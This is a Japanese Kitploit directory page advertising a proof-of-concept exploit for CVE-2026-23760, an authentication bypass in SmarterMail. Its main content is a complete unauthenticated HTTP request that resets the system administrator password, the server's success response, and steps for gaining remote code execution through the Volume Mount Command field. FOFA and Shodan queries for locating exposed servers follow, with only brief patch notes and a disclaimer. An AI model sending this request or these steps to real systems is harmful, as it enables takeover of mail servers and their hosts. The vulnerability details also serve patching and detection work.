Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
smartermail-CVE-2026-23760-poc — CVE-2026-23760 - SmarterMail のパスワードリセットAPIを介した認証バイパス | Kitploit
ツール/GitHubGitHub/maxmnml/smartermail-cve-2026-23760-poc
認証と認可脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubmaxmnml/smartermail-cve-2026-23760-poc

smartermail-CVE-2026-23760-poc

CVE-2026-23760 - SmarterMail のパスワードリセットAPIを介した認証バイパス

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
627ヶ月前未レビュー

SmarterMail-CVE-2026-23760-poc

SmarterMailシステム管理者アカウントのパスワードリセットAPIを介した認証バイパスを悪用する概念実証(PoC)です。

脆弱性

この脆弱性は、パスワードリセットAPIにおける認証バイパスに起因します。force-reset-passwordエンドポイントは匿名リクエストを許可し、システム管理者アカウントをリセットする際に既存のパスワードやリセットトークンを検証しません。

  • システム管理者アカウントの乗っ取り。
  • SmarterMailの組み込み機能を介したリモートコード実行への直接的な経路。

影響を受けるバージョン

  • ビルド9511より前のSmarterTools SmarterMailバージョン

PoC(watchtowr labs提供)

PoCは以下のようにシンプルです:

root@kitploit:~
POST /api/v1/auth/force-reset-password HTTP/1.1
Host: xxxxxxx:9998
Content-Type: application/json
Content-Length: 145

{"IsSysAdmin":"true",
"OldPassword":"watever",
"Username":"admin",
"NewPassword":"NewPassword123!@#",
"ConfirmPassword": "NewPassword123!@#"}

パスワードが正常に変更されたことを確認する、以下のようなレスポンスが返されます:

root@kitploit:~
{
"username":"",
"errorCode":"",
"errorData":"",
"debugInfo":"check1\\r\\ncheck2\\r\\ncheck3\\r\\ncheck4.2\\r\\ncheck5.2\\r\\ncheck6.2\\r\\ncheck7.2\\r\\ncheck8.2\\r\\n",
"success":true,
"resultCode":200
}

残る唯一の要件は、管理者アカウントのユーザー名を知っていることです。

ATOからRCE、そしてその先へ

システム管理者として認証されると、攻撃者は以下を実行できます:

  • Settings -> Volume Mountsに移動する。
  • 新しいボリュームを作成する。
  • Volume Mount Commandフィールドに任意のコマンドを指定する。

そのコマンドは基盤となるオペレーティングシステムによって実行されます。この時点で、攻撃者はホスト上で完全なリモートコード実行を達成しています。

設定が保存されると、指定されたコマンドが即座に実行されます。

自動化

Nucleiテンプレート:

https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2026/CVE-2026-23760.yaml

実環境での検索

FOFA:

root@kitploit:~
title='SmarterMail'

SHODAN:

root@kitploit:~
html:'SmarterMail'

影響

認証されていないリモート攻撃者は、システム管理者アカウントの認証をバイパスしてアクセスを取得できます。認証後、ホスト上で完全なリモートコード実行を達成できます。

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N - 9.3:Critical

修復と緩和策

最新バージョンに更新してください:https://www.smartertools.com/smartermail/downloads

  • ビルド9511(2026年1月15日)
  • ビルド9518(2026年1月22日)

参考情報

  • SmarterMailリリースノート
  • https://nvd.nist.gov/vuln/detail/CVE-2026-23760
  • watchTowrブログおよびPoC

免責事項

このツールは、許可されたセキュリティテスト専用です。コンピュータシステムへの不正アクセスは違法です。

ツールをダウンロード